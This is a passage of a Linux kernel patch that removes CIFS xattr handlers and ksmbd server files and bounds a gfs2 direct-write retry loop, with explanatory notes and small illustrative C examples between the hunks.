+-	/* return dos attributes as pseudo xattr */
+-	pattribute = (__u32 *)value;
+-	*pattribute = CIFS_I(inode)->cifsAttrs;
+-
+-	return sizeof(__u32);
+-}
+-
+-static int cifs_creation_time_get(struct dentry *dentry, struct inode *inode,
+-				  void *value, size_t size)
+-{
+-	ssize_t rc;
+-	__u64 *pcreatetime;
+-
+-	rc = cifs_revalidate_dentry_attr(dentry);
+-	if (rc)
+-		return rc;
+-
+-	if ((value == NULL) || (size == 0))
+-		return sizeof(__u64);
+-	else if (size < sizeof(__u64))
+-		return -ERANGE;
+-
+-	/* return dos attributes as pseudo xattr */
+-	pcreatetime = (__u64 *)value;
+-	*pcreatetime = CIFS_I(inode)->createtime;
+-	return sizeof(__u64);
+-}
+-
+-
+-static int cifs_xattr_get(const struct xattr_handler *handler,
+-			  struct dentry *dentry, struct inode *inode,
+-			  const char *name, void *value, size_t size)
+-{
+-	ssize_t rc = -EOPNOTSUPP;
+-	unsigned int xid;
+-	struct super_block *sb = dentry->d_sb;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
+-	struct tcon_link *tlink;
+-	struct cifs_tcon *pTcon;
+-	const char *full_path;
+-	void *page;
+-
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink))
+-		return PTR_ERR(tlink);
+-	pTcon = tlink_tcon(tlink);
+-
+-	xid = get_xid();
+-	page = alloc_dentry_path();
+-
+-	full_path = build_path_from_dentry(dentry, page);
+-	if (IS_ERR(full_path)) {
+-		rc = PTR_ERR(full_path);
+-		goto out;
+-	}
+-
+-	/* return alt name if available as pseudo attr */
+-	switch (handler->flags) {
+-	case XATTR_USER:
+-		cifs_dbg(FYI, "%s:querying user xattr %s\n", __func__, name);
+-		if ((strcmp(name, CIFS_XATTR_ATTRIB) == 0) ||
+-		    (strcmp(name, SMB3_XATTR_ATTRIB) == 0)) {
+-			rc = cifs_attrib_get(dentry, inode, value, size);
+-			break;
+-		} else if ((strcmp(name, CIFS_XATTR_CREATETIME) == 0) ||
+-		    (strcmp(name, SMB3_XATTR_CREATETIME) == 0)) {
+-			rc = cifs_creation_time_get(dentry, inode, value, size);
+-			break;
+-		}
+-
+-		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_XATTR)
+-			goto out;
+-
+-		if (pTcon->ses->server->ops->query_all_EAs)
+-			rc = pTcon->ses->server->ops->query_all_EAs(xid, pTcon,
+-				full_path, name, value, size, cifs_sb);
+-		break;
+-
+-	case XATTR_CIFS_ACL:
+-	case XATTR_CIFS_NTSD:
+-	case XATTR_CIFS_NTSD_FULL: {
+-		/*
+-		 * fetch owner, DACL, and SACL if asked for full descriptor,
+-		 * fetch owner and DACL otherwise
+-		 */
+-		u32 acllen, extra_info;
+-		struct cifs_ntsd *pacl;
+-
+-		if (pTcon->ses->server->ops->get_acl == NULL)
+-			goto out; /* rc already EOPNOTSUPP */
+-
+-		if (handler->flags == XATTR_CIFS_NTSD_FULL) {
+-			extra_info = SACL_SECINFO;
+-		} else {
+-			extra_info = 0;
+-		}
+-		pacl = pTcon->ses->server->ops->get_acl(cifs_sb,
+-				inode, full_path, &acllen, extra_info);
+-		if (IS_ERR(pacl)) {
+-			rc = PTR_ERR(pacl);
+-			cifs_dbg(VFS, "%s: error %zd getting sec desc\n",
+-				 __func__, rc);
+-		} else {
+-			if (value) {
+-				if (acllen > size)
+-					acllen = -ERANGE;
+-				else
+-					memcpy(value, pacl, acllen);
+-			}
+-			rc = acllen;
+-			kfree(pacl);
+-		}
+-		break;
+-	}
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-	case XATTR_ACL_ACCESS:
+-#ifdef CONFIG_CIFS_POSIX
+-		if (sb->s_flags & SB_POSIXACL)
+-			rc = CIFSSMBGetPosixACL(xid, pTcon, full_path,
+-				value, size, ACL_TYPE_ACCESS,
+-				cifs_sb->local_nls,
+-				cifs_remap(cifs_sb));
+-#endif  /* CONFIG_CIFS_POSIX */
+-		break;
+-
+-	case XATTR_ACL_DEFAULT:
+-#ifdef CONFIG_CIFS_POSIX
+-		if (sb->s_flags & SB_POSIXACL)
+-			rc = CIFSSMBGetPosixACL(xid, pTcon, full_path,
+-				value, size, ACL_TYPE_DEFAULT,
+-				cifs_sb->local_nls,
+-				cifs_remap(cifs_sb));
+-#endif  /* CONFIG_CIFS_POSIX */
+-		break;
+-#endif /* ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY */
+-	}
+-
+-	/* We could add an additional check for streams, i.e.
+-	    if proc/fs/cifs/streamstoxattr is set then
+-		search server for EAs or streams to
+-		return as xattrs */
+-
+-	if (rc == -EINVAL)
+-		rc = -EOPNOTSUPP;
+-
+-out:
+-	free_dentry_path(page);
+-	free_xid(xid);
+-	cifs_put_tlink(tlink);
+-	return rc;
+-}
+-
+-ssize_t cifs_listxattr(struct dentry *direntry, char *data, size_t buf_size)
+-{
+-	ssize_t rc = -EOPNOTSUPP;
+-	unsigned int xid;
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(direntry->d_sb);
+-	struct tcon_link *tlink;
+-	struct cifs_tcon *pTcon;
+-	const char *full_path;
+-	void *page;
+-
+-	if (unlikely(cifs_forced_shutdown(cifs_sb)))
+-		return -EIO;
+-
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NO_XATTR)
+-		return -EOPNOTSUPP;
+-
+-	tlink = cifs_sb_tlink(cifs_sb);
+-	if (IS_ERR(tlink))
+-		return PTR_ERR(tlink);
+-	pTcon = tlink_tcon(tlink);
+-
+-	xid = get_xid();
+-	page = alloc_dentry_path();
+-
+-	full_path = build_path_from_dentry(direntry, page);
+-	if (IS_ERR(full_path)) {
+-		rc = PTR_ERR(full_path);
+-		goto list_ea_exit;
+-	}
+-	/* return dos attributes as pseudo xattr */
+-	/* return alt name if available as pseudo attr */
+-
+-	/* if proc/fs/cifs/streamstoxattr is set then
+-		search server for EAs or streams to
+-		return as xattrs */
+-
+-	if (pTcon->ses->server->ops->query_all_EAs)
+-		rc = pTcon->ses->server->ops->query_all_EAs(xid, pTcon,
+-				full_path, NULL, data, buf_size, cifs_sb);
+-list_ea_exit:
+-	free_dentry_path(page);
+-	free_xid(xid);
+-	cifs_put_tlink(tlink);
+-	return rc;
+-}
+-
+-static const struct xattr_handler cifs_user_xattr_handler = {
+-	.prefix = XATTR_USER_PREFIX,
+-	.flags = XATTR_USER,
+-	.get = cifs_xattr_get,
+-	.set = cifs_xattr_set,
+-};
+-
+-/* os2.* attributes are treated like user.* attributes */
+-static const struct xattr_handler cifs_os2_xattr_handler = {
+-	.prefix = XATTR_OS2_PREFIX,
+-	.flags = XATTR_USER,
+-	.get = cifs_xattr_get,
+-	.set = cifs_xattr_set,
+-};
+-
+-static const struct xattr_handler cifs_cifs_acl_xattr_handler = {
+-	.name = CIFS_XATTR_CIFS_ACL,
+-	.flags = XATTR_CIFS_ACL,
+-	.get = cifs_xattr_get,
+-	.set = cifs_xattr_set,
+-};
+-
+-/*
+- * Although this is just an alias for the above, need to move away from
+- * confusing users and using the 20 year old term 'cifs' when it is no
+- * longer secure and was replaced by SMB2/SMB3 a long time ago, and
+- * SMB3 and later are highly secure.
+- */
+-static const struct xattr_handler smb3_acl_xattr_handler = {
+-	.name = SMB3_XATTR_CIFS_ACL,
+-	.flags = XATTR_CIFS_ACL,
+-	.get = cifs_xattr_get,
+-	.set = cifs_xattr_set,
+-};
+-
+-static const struct xattr_handler cifs_cifs_ntsd_xattr_handler = {
+-	.name = CIFS_XATTR_CIFS_NTSD,
+-	.flags = XATTR_CIFS_NTSD,
+-	.get = cifs_xattr_get,
+-	.set = cifs_xattr_set,
+-};
+-
+-/*
+- * Although this is just an alias for the above, need to move away from
+- * confusing users and using the 20 year old term 'cifs' when it is no
+- * longer secure and was replaced by SMB2/SMB3 a long time ago, and
+- * SMB3 and later are highly secure.
+- */
+-static const struct xattr_handler smb3_ntsd_xattr_handler = {
+-	.name = SMB3_XATTR_CIFS_NTSD,
+-	.flags = XATTR_CIFS_NTSD,
+-	.get = cifs_xattr_get,
+-	.set = cifs_xattr_set,
+-};
+-
+-static const struct xattr_handler cifs_cifs_ntsd_full_xattr_handler = {
+-	.name = CIFS_XATTR_CIFS_NTSD_FULL,
+-	.flags = XATTR_CIFS_NTSD_FULL,
+-	.get = cifs_xattr_get,
+-	.set = cifs_xattr_set,
+-};
+-
+-/*
+- * Although this is just an alias for the above, need to move away from
+- * confusing users and using the 20 year old term 'cifs' when it is no
+- * longer secure and was replaced by SMB2/SMB3 a long time ago, and
+- * SMB3 and later are highly secure.
+- */
+-static const struct xattr_handler smb3_ntsd_full_xattr_handler = {
+-	.name = SMB3_XATTR_CIFS_NTSD_FULL,
+-	.flags = XATTR_CIFS_NTSD_FULL,
+-	.get = cifs_xattr_get,
+-	.set = cifs_xattr_set,
+-};
+-
+-
+-static const struct xattr_handler cifs_posix_acl_access_xattr_handler = {
+-	.name = XATTR_NAME_POSIX_ACL_ACCESS,
+-	.flags = XATTR_ACL_ACCESS,
+-	.get = cifs_xattr_get,
+-	.set = cifs_xattr_set,
+-};
+-
+-static const struct xattr_handler cifs_posix_acl_default_xattr_handler = {
+-	.name = XATTR_NAME_POSIX_ACL_DEFAULT,
+-	.flags = XATTR_ACL_DEFAULT,
+-	.get = cifs_xattr_get,
+-	.set = cifs_xattr_set,
+-};
+-
+-const struct xattr_handler *cifs_xattr_handlers[] = {
+-	&cifs_user_xattr_handler,
+-	&cifs_os2_xattr_handler,
+-	&cifs_cifs_acl_xattr_handler,
+-	&smb3_acl_xattr_handler, /* alias for above since avoiding "cifs" */
+-	&cifs_cifs_ntsd_xattr_handler,
+-	&smb3_ntsd_xattr_handler, /* alias for above since avoiding "cifs" */
+-	&cifs_cifs_ntsd_full_xattr_handler,
+-	&smb3_ntsd_full_xattr_handler, /* alias for above since avoiding "cifs" */
+-	&cifs_posix_acl_access_xattr_handler,
+-	&cifs_posix_acl_default_xattr_handler,
+-	NULL
+-};
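
The file deleted above is the old fs/cifs/xattr.c, which maps DOS metadata and NT security descriptors onto Linux xattr names: user.cifs.dosattrib/user.smb3.dosattrib return the __u32 attribute bits, user.cifs.creationtime/user.smb3.creationtime the __u64 creation time, and the system.cifs_acl/system.smb3_acl family the security descriptor. A minimal userspace sketch of reading the pseudo-xattrs through getxattr(2) follows; the mount path is an assumption for illustration, not from the patch:

/* hypothetical example: read the pseudo-xattrs served by the handlers above */
#include <stdio.h>
#include <stdint.h>
#include <sys/xattr.h>

int main(void)
{
	const char *path = "/mnt/share/file.txt";	/* assumed SMB3 mount */
	uint32_t dosattrib;
	uint64_t createtime;

	/* cifs_attrib_get() returns exactly sizeof(__u32) on success */
	if (getxattr(path, "user.smb3.dosattrib",
		     &dosattrib, sizeof(dosattrib)) == sizeof(dosattrib))
		printf("DOS attributes: 0x%08x\n", (unsigned)dosattrib);

	/* cifs_creation_time_get() returns exactly sizeof(__u64) */
	if (getxattr(path, "user.smb3.creationtime",
		     &createtime, sizeof(createtime)) == sizeof(createtime))
		printf("creation time: %llu\n",
		       (unsigned long long)createtime);
	return 0;
}

Passing a NULL value (or size 0) first returns the needed size, matching the probe-then-fetch convention of getxattr(2) that the deleted getters implement.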
+diff --git a/fs/gfs2/file.c b/fs/gfs2/file.c
+index 60c6fb91fb589..bc6cd5f4b1077 100644
+--- a/fs/gfs2/file.c
++++ b/fs/gfs2/file.c
+@@ -783,9 +783,13 @@ static inline bool should_fault_in_pages(struct iov_iter *i,
+ 	if (!user_backed_iter(i))
+ 		return false;
+ 
++	/*
++	 * Try to fault in multiple pages initially.  When that doesn't result
++	 * in any progress, fall back to a single page.
++	 */
+ 	size = PAGE_SIZE;
+ 	offs = offset_in_page(iocb->ki_pos);
+-	if (*prev_count != count || !*window_size) {
++	if (*prev_count != count) {
+ 		size_t nr_dirtied;
+ 
+ 		nr_dirtied = max(current->nr_dirtied_pause -
+@@ -869,6 +873,7 @@ static ssize_t gfs2_file_direct_write(struct kiocb *iocb, struct iov_iter *from,
+ 	struct gfs2_inode *ip = GFS2_I(inode);
+ 	size_t prev_count = 0, window_size = 0;
+ 	size_t written = 0;
++	bool enough_retries;
+ 	ssize_t ret;
+ 
+ 	/*
+@@ -912,11 +917,17 @@ retry:
+ 	if (ret > 0)
+ 		written = ret;
+ 
++	enough_retries = prev_count == iov_iter_count(from) &&
++			 window_size <= PAGE_SIZE;
+ 	if (should_fault_in_pages(from, iocb, &prev_count, &window_size)) {
+ 		gfs2_glock_dq(gh);
+ 		window_size -= fault_in_iov_iter_readable(from, window_size);
+-		if (window_size)
+-			goto retry;
++		if (window_size) {
++			if (!enough_retries)
++				goto retry;
++			/* fall back to buffered I/O */
++			ret = 0;
++		}
+ 	}
+ out_unlock:
+ 	if (gfs2_holder_queued(gh))
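
The gfs2 hunk above bounds the direct-I/O fault-in retry loop: once the residual byte count is unchanged from the previous pass and the fault-in window has already shrunk to a single page, another retry cannot make progress, so the write falls back to buffered I/O (ret = 0) instead of spinning. A rough, self-contained sketch of that control shape, where try_direct() and fault_in() are toy stand-ins rather than kernel APIs:

/* toy model, not kernel code: bounded retry with buffered fallback */
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>

#define PAGE_SIZE 4096

static int attempts;

/* stand-in for the direct write: "faults" once, then succeeds */
static long try_direct(size_t count, size_t *window)
{
	*window = PAGE_SIZE;
	return (++attempts < 2) ? -1 : (long)count;
}

/* stand-in for fault_in_iov_iter_readable(): everything readable */
static size_t fault_in(size_t window)
{
	(void)window;
	return 0;
}

static long write_with_fallback(size_t count)
{
	size_t prev_count = 0, window = 0;
	bool enough_retries;
	long ret;

retry:
	ret = try_direct(count, &window);
	if (ret >= 0)
		return ret;
	/* no forward progress: same residual count, window down to a page */
	enough_retries = (prev_count == count && window <= PAGE_SIZE);
	prev_count = count;
	window -= fault_in(window);
	if (window && !enough_retries)
		goto retry;
	return window ? 0 /* fall back to buffered I/O */ : ret;
}

int main(void)
{
	printf("wrote %ld bytes\n", write_with_fallback(8192));
	return 0;
}

The point mirrored from the patch is that enough_retries is sampled from the previous iteration's state before the window is faulted in again, so the loop terminates as soon as retrying stops helping.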
+diff --git a/fs/ksmbd/Kconfig b/fs/ksmbd/Kconfig
+deleted file mode 100644
+index e1fe17747ed69..0000000000000
+--- a/fs/ksmbd/Kconfig
++++ /dev/null
+@@ -1,68 +0,0 @@
+-config SMB_SERVER
+-	tristate "SMB3 server support (EXPERIMENTAL)"
+-	depends on INET
+-	depends on MULTIUSER
+-	depends on FILE_LOCKING
+-	select NLS
+-	select NLS_UTF8
+-	select CRYPTO
+-	select CRYPTO_MD5
+-	select CRYPTO_HMAC
+-	select CRYPTO_ECB
+-	select CRYPTO_LIB_DES
+-	select CRYPTO_SHA256
+-	select CRYPTO_CMAC
+-	select CRYPTO_SHA512
+-	select CRYPTO_AEAD2
+-	select CRYPTO_CCM
+-	select CRYPTO_GCM
+-	select ASN1
+-	select OID_REGISTRY
+-	select CRC32
+-	default n
+-	help
+-	  Choose Y here if you want to allow SMB3 compliant clients
+-	  to access files residing on this system using SMB3 protocol.
+-	  To compile the SMB3 server support as a module,
+-	  choose M here: the module will be called ksmbd.
+-
+-	  You may choose to use a samba server instead, in which
+-	  case you can choose N here.
+-
+-	  You also need to install user space programs which can be found
+-	  in ksmbd-tools, available from
+-	  https://github.com/cifsd-team/ksmbd-tools.
+-	  More detail about how to run the ksmbd kernel server is
+-	  available via README file
+-	  (https://github.com/cifsd-team/ksmbd-tools/blob/master/README).
+-
+-	  ksmbd kernel server includes support for auto-negotiation,
+-	  Secure negotiate, Pre-authentication integrity, oplock/lease,
+-	  compound requests, multi-credit, packet signing, RDMA(smbdirect),
+-	  smb3 encryption, copy-offload, secure per-user session
+-	  establishment via NTLM or NTLMv2.
+-
+-config SMB_SERVER_SMBDIRECT
+-	bool "Support for SMB Direct protocol"
+-	depends on SMB_SERVER=m && INFINIBAND && INFINIBAND_ADDR_TRANS || SMB_SERVER=y && INFINIBAND=y && INFINIBAND_ADDR_TRANS=y
+-	select SG_POOL
+-	default n
+-
+-	help
+-	  Enables SMB Direct support for SMB 3.0, 3.02 and 3.1.1.
+-
+-	  SMB Direct allows transferring SMB packets over RDMA. If unsure,
+-	  say N.
+-
+-config SMB_SERVER_CHECK_CAP_NET_ADMIN
+-	bool "Enable check network administration capability"
+-	depends on SMB_SERVER
+-	default y
+-
+-	help
+-	  Prevent unprivileged processes from starting the ksmbd kernel server.
+-
+-config SMB_SERVER_KERBEROS5
+-	bool "Support for Kerberos 5"
+-	depends on SMB_SERVER
+-	default n
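
For reference, enabling the server this Kconfig described would look like the fragment below in a kernel .config (illustrative values; SMB Direct additionally requires the InfiniBand symbols named in its depends line):

CONFIG_SMB_SERVER=m
CONFIG_SMB_SERVER_SMBDIRECT=y
CONFIG_SMB_SERVER_CHECK_CAP_NET_ADMIN=y
# CONFIG_SMB_SERVER_KERBEROS5 is not set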
+diff --git a/fs/ksmbd/Makefile b/fs/ksmbd/Makefile
+deleted file mode 100644
+index 7d6337a7dee40..0000000000000
+--- a/fs/ksmbd/Makefile
++++ /dev/null
+@@ -1,20 +0,0 @@
+-# SPDX-License-Identifier: GPL-2.0-or-later
+-#
+-# Makefile for Linux SMB3 kernel server
+-#
+-obj-$(CONFIG_SMB_SERVER) += ksmbd.o
+-
+-ksmbd-y :=	unicode.o auth.o vfs.o vfs_cache.o server.o ndr.o \
+-		misc.o oplock.o connection.o ksmbd_work.o crypto_ctx.o \
+-		mgmt/ksmbd_ida.o mgmt/user_config.o mgmt/share_config.o \
+-		mgmt/tree_connect.o mgmt/user_session.o smb_common.o \
+-		transport_tcp.o transport_ipc.o smbacl.o smb2pdu.o \
+-		smb2ops.o smb2misc.o ksmbd_spnego_negtokeninit.asn1.o \
+-		ksmbd_spnego_negtokentarg.asn1.o asn1.o
+-
+-$(obj)/asn1.o: $(obj)/ksmbd_spnego_negtokeninit.asn1.h $(obj)/ksmbd_spnego_negtokentarg.asn1.h
+-
+-$(obj)/ksmbd_spnego_negtokeninit.asn1.o: $(obj)/ksmbd_spnego_negtokeninit.asn1.c $(obj)/ksmbd_spnego_negtokeninit.asn1.h
+-$(obj)/ksmbd_spnego_negtokentarg.asn1.o: $(obj)/ksmbd_spnego_negtokentarg.asn1.c $(obj)/ksmbd_spnego_negtokentarg.asn1.h
+-
+-ksmbd-$(CONFIG_SMB_SERVER_SMBDIRECT) += transport_rdma.o
+diff --git a/fs/ksmbd/asn1.c b/fs/ksmbd/asn1.c
+deleted file mode 100644
+index c03eba0903682..0000000000000
+--- a/fs/ksmbd/asn1.c
++++ /dev/null
+@@ -1,239 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- * The ASN.1/BER parsing code is derived from ip_nat_snmp_basic.c which was in
+- * turn derived from the gxsnmp package by Gregory McLean & Jochen Friedrich
+- *
+- * Copyright (c) 2000 RP Internet (www.rpi.net.au).
+- */
+-
+-#include <linux/module.h>
+-#include <linux/types.h>
+-#include <linux/kernel.h>
+-#include <linux/mm.h>
+-#include <linux/slab.h>
+-#include <linux/oid_registry.h>
+-
+-#include "glob.h"
+-
+-#include "asn1.h"
+-#include "connection.h"
+-#include "auth.h"
+-#include "ksmbd_spnego_negtokeninit.asn1.h"
+-#include "ksmbd_spnego_negtokentarg.asn1.h"
+-
+-#define NTLMSSP_OID_LEN  10
+-
+-static char NTLMSSP_OID_STR[NTLMSSP_OID_LEN] = { 0x2b, 0x06, 0x01, 0x04, 0x01,
+-	0x82, 0x37, 0x02, 0x02, 0x0a };
+-
+-int
+-ksmbd_decode_negTokenInit(unsigned char *security_blob, int length,
+-			  struct ksmbd_conn *conn)
+-{
+-	return asn1_ber_decoder(&ksmbd_spnego_negtokeninit_decoder, conn,
+-				security_blob, length);
+-}
+-
+-int
+-ksmbd_decode_negTokenTarg(unsigned char *security_blob, int length,
+-			  struct ksmbd_conn *conn)
+-{
+-	return asn1_ber_decoder(&ksmbd_spnego_negtokentarg_decoder, conn,
+-				security_blob, length);
+-}
+-
+-static int compute_asn_hdr_len_bytes(int len)
+-{
+-	if (len > 0xFFFFFF)
+-		return 4;
+-	else if (len > 0xFFFF)
+-		return 3;
+-	else if (len > 0xFF)
+-		return 2;
+-	else if (len > 0x7F)
+-		return 1;
+-	else
+-		return 0;
+-}
+-
+-static void encode_asn_tag(char *buf, unsigned int *ofs, char tag, char seq,
+-			   int length)
+-{
+-	int i;
+-	int index = *ofs;
+-	char hdr_len = compute_asn_hdr_len_bytes(length);
+-	int len = length + 2 + hdr_len;
+-
+-	/* insert tag */
+-	buf[index++] = tag;
+-
+-	if (!hdr_len) {
+-		buf[index++] = len;
+-	} else {
+-		buf[index++] = 0x80 | hdr_len;
+-		for (i = hdr_len - 1; i >= 0; i--)
+-			buf[index++] = (len >> (i * 8)) & 0xFF;
+-	}
+-
+-	/* insert seq */
+-	len = len - (index - *ofs);
+-	buf[index++] = seq;
+-
+-	if (!hdr_len) {
+-		buf[index++] = len;
+-	} else {
+-		buf[index++] = 0x80 | hdr_len;
+-		for (i = hdr_len - 1; i >= 0; i--)
+-			buf[index++] = (len >> (i * 8)) & 0xFF;
+-	}
+-
+-	*ofs += (index - *ofs);
+-}
+-
+-int build_spnego_ntlmssp_neg_blob(unsigned char **pbuffer, u16 *buflen,
+-				  char *ntlm_blob, int ntlm_blob_len)
+-{
+-	char *buf;
+-	unsigned int ofs = 0;
+-	int neg_result_len = 4 + compute_asn_hdr_len_bytes(1) * 2 + 1;
+-	int oid_len = 4 + compute_asn_hdr_len_bytes(NTLMSSP_OID_LEN) * 2 +
+-		NTLMSSP_OID_LEN;
+-	int ntlmssp_len = 4 + compute_asn_hdr_len_bytes(ntlm_blob_len) * 2 +
+-		ntlm_blob_len;
+-	int total_len = 4 + compute_asn_hdr_len_bytes(neg_result_len +
+-			oid_len + ntlmssp_len) * 2 +
+-			neg_result_len + oid_len + ntlmssp_len;
+-
+-	buf = kmalloc(total_len, GFP_KERNEL);
+-	if (!buf)
+-		return -ENOMEM;
+-
+-	/* insert main gss header */
+-	encode_asn_tag(buf, &ofs, 0xa1, 0x30, neg_result_len + oid_len +
+-			ntlmssp_len);
+-
+-	/* insert neg result */
+-	encode_asn_tag(buf, &ofs, 0xa0, 0x0a, 1);
+-	buf[ofs++] = 1;
+-
+-	/* insert oid */
+-	encode_asn_tag(buf, &ofs, 0xa1, 0x06, NTLMSSP_OID_LEN);
+-	memcpy(buf + ofs, NTLMSSP_OID_STR, NTLMSSP_OID_LEN);
+-	ofs += NTLMSSP_OID_LEN;
+-
+-	/* insert response token - ntlmssp blob */
+-	encode_asn_tag(buf, &ofs, 0xa2, 0x04, ntlm_blob_len);
+-	memcpy(buf + ofs, ntlm_blob, ntlm_blob_len);
+-	ofs += ntlm_blob_len;
+-
+-	*pbuffer = buf;
+-	*buflen = total_len;
+-	return 0;
+-}
+-
+-int build_spnego_ntlmssp_auth_blob(unsigned char **pbuffer, u16 *buflen,
+-				   int neg_result)
+-{
+-	char *buf;
+-	unsigned int ofs = 0;
+-	int neg_result_len = 4 + compute_asn_hdr_len_bytes(1) * 2 + 1;
+-	int total_len = 4 + compute_asn_hdr_len_bytes(neg_result_len) * 2 +
+-		neg_result_len;
+-
+-	buf = kmalloc(total_len, GFP_KERNEL);
+-	if (!buf)
+-		return -ENOMEM;
+-
+-	/* insert main gss header */
+-	encode_asn_tag(buf, &ofs, 0xa1, 0x30, neg_result_len);
+-
+-	/* insert neg result */
+-	encode_asn_tag(buf, &ofs, 0xa0, 0x0a, 1);
+-	if (neg_result)
+-		buf[ofs++] = 2;
+-	else
+-		buf[ofs++] = 0;
+-
+-	*pbuffer = buf;
+-	*buflen = total_len;
+-	return 0;
+-}
+-
+-int ksmbd_gssapi_this_mech(void *context, size_t hdrlen, unsigned char tag,
+-			   const void *value, size_t vlen)
+-{
+-	enum OID oid;
+-
+-	oid = look_up_OID(value, vlen);
+-	if (oid != OID_spnego) {
+-		char buf[50];
+-
+-		sprint_oid(value, vlen, buf, sizeof(buf));
+-		ksmbd_debug(AUTH, "Unexpected OID: %s\n", buf);
+-		return -EBADMSG;
+-	}
+-
+-	return 0;
+-}
+-
+-int ksmbd_neg_token_init_mech_type(void *context, size_t hdrlen,
+-				   unsigned char tag, const void *value,
+-				   size_t vlen)
+-{
+-	struct ksmbd_conn *conn = context;
+-	enum OID oid;
+-	int mech_type;
+-
+-	oid = look_up_OID(value, vlen);
+-	if (oid == OID_ntlmssp) {
+-		mech_type = KSMBD_AUTH_NTLMSSP;
+-	} else if (oid == OID_mskrb5) {
+-		mech_type = KSMBD_AUTH_MSKRB5;
+-	} else if (oid == OID_krb5) {
+-		mech_type = KSMBD_AUTH_KRB5;
+-	} else if (oid == OID_krb5u2u) {
+-		mech_type = KSMBD_AUTH_KRB5U2U;
+-	} else {
+-		char buf[50];
+-
+-		sprint_oid(value, vlen, buf, sizeof(buf));
+-		ksmbd_debug(AUTH, "Unexpected OID: %s\n", buf);
+-		return -EBADMSG;
+-	}
+-
+-	conn->auth_mechs |= mech_type;
+-	if (conn->preferred_auth_mech == 0)
+-		conn->preferred_auth_mech = mech_type;
+-
+-	return 0;
+-}
+-
+-int ksmbd_neg_token_init_mech_token(void *context, size_t hdrlen,
+-				    unsigned char tag, const void *value,
+-				    size_t vlen)
+-{
+-	struct ksmbd_conn *conn = context;
+-
+-	conn->mechToken = kmalloc(vlen + 1, GFP_KERNEL);
+-	if (!conn->mechToken)
+-		return -ENOMEM;
+-
+-	memcpy(conn->mechToken, value, vlen);
+-	conn->mechToken[vlen] = '\0';
+-	return 0;
+-}
+-
+-int ksmbd_neg_token_targ_resp_token(void *context, size_t hdrlen,
+-				    unsigned char tag, const void *value,
+-				    size_t vlen)
+-{
+-	struct ksmbd_conn *conn = context;
+-
+-	conn->mechToken = kmalloc(vlen + 1, GFP_KERNEL);
+-	if (!conn->mechToken)
+-		return -ENOMEM;
+-
+-	memcpy(conn->mechToken, value, vlen);
+-	conn->mechToken[vlen] = '\0';
+-	return 0;
+-}
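
The helpers deleted above hand-roll BER definite-length encoding: a length up to 0x7F is stored in a single octet (short form), while anything larger uses the long form, 0x80|n followed by n big-endian length octets. A self-contained sketch of the same arithmetic, mirroring compute_asn_hdr_len_bytes() and the length-emitting loop of encode_asn_tag():

/* illustrative only: BER definite-length encoding as in the deleted code */
#include <stdio.h>

static int hdr_len_bytes(int len)
{
	if (len > 0xFFFFFF)
		return 4;
	else if (len > 0xFFFF)
		return 3;
	else if (len > 0xFF)
		return 2;
	else if (len > 0x7F)
		return 1;
	return 0;
}

static int encode_len(unsigned char *buf, int len)
{
	int n = hdr_len_bytes(len), i, idx = 0;

	if (!n) {
		buf[idx++] = len;		/* short form */
	} else {
		buf[idx++] = 0x80 | n;		/* long form marker */
		for (i = n - 1; i >= 0; i--)
			buf[idx++] = (len >> (i * 8)) & 0xFF;
	}
	return idx;
}

int main(void)
{
	unsigned char buf[8];
	int i, n = encode_len(buf, 300);

	for (i = 0; i < n; i++)
		printf("%02x ", buf[i]);
	printf("\n");
	return 0;
}

Here encode_len(buf, 300) prints "82 01 2c": a long-form marker announcing two length octets, carrying 0x012c = 300.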
+diff --git a/fs/ksmbd/asn1.h b/fs/ksmbd/asn1.h
+deleted file mode 100644
+index ce105f4ce305a..0000000000000
+--- a/fs/ksmbd/asn1.h
++++ /dev/null
+@@ -1,21 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- * The ASN.1/BER parsing code is derived from ip_nat_snmp_basic.c which was in
+- * turn derived from the gxsnmp package by Gregory McLean & Jochen Friedrich
+- *
+- * Copyright (c) 2000 RP Internet (www.rpi.net.au).
+- * Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef __ASN1_H__
+-#define __ASN1_H__
+-
+-int ksmbd_decode_negTokenInit(unsigned char *security_blob, int length,
+-			      struct ksmbd_conn *conn);
+-int ksmbd_decode_negTokenTarg(unsigned char *security_blob, int length,
+-			      struct ksmbd_conn *conn);
+-int build_spnego_ntlmssp_neg_blob(unsigned char **pbuffer, u16 *buflen,
+-				  char *ntlm_blob, int ntlm_blob_len);
+-int build_spnego_ntlmssp_auth_blob(unsigned char **pbuffer, u16 *buflen,
+-				   int neg_result);
+-#endif /* __ASN1_H__ */
+diff --git a/fs/ksmbd/auth.c b/fs/ksmbd/auth.c
+deleted file mode 100644
+index df8fb076f6f14..0000000000000
+--- a/fs/ksmbd/auth.c
++++ /dev/null
+@@ -1,1206 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#include <linux/kernel.h>
+-#include <linux/fs.h>
+-#include <linux/uaccess.h>
+-#include <linux/backing-dev.h>
+-#include <linux/writeback.h>
+-#include <linux/uio.h>
+-#include <linux/xattr.h>
+-#include <crypto/hash.h>
+-#include <crypto/aead.h>
+-#include <linux/random.h>
+-#include <linux/scatterlist.h>
+-
+-#include "auth.h"
+-#include "glob.h"
+-
+-#include <linux/fips.h>
+-#include <crypto/des.h>
+-
+-#include "server.h"
+-#include "smb_common.h"
+-#include "connection.h"
+-#include "mgmt/user_session.h"
+-#include "mgmt/user_config.h"
+-#include "crypto_ctx.h"
+-#include "transport_ipc.h"
+-#include "../smbfs_common/arc4.h"
+-
+-/*
+- * Fixed format data defining GSS header and fixed string
+- * "not_defined_in_RFC4178@please_ignore".
+- * So sec blob data in neg phase could be generated statically.
+- */
+-static char NEGOTIATE_GSS_HEADER[AUTH_GSS_LENGTH] = {
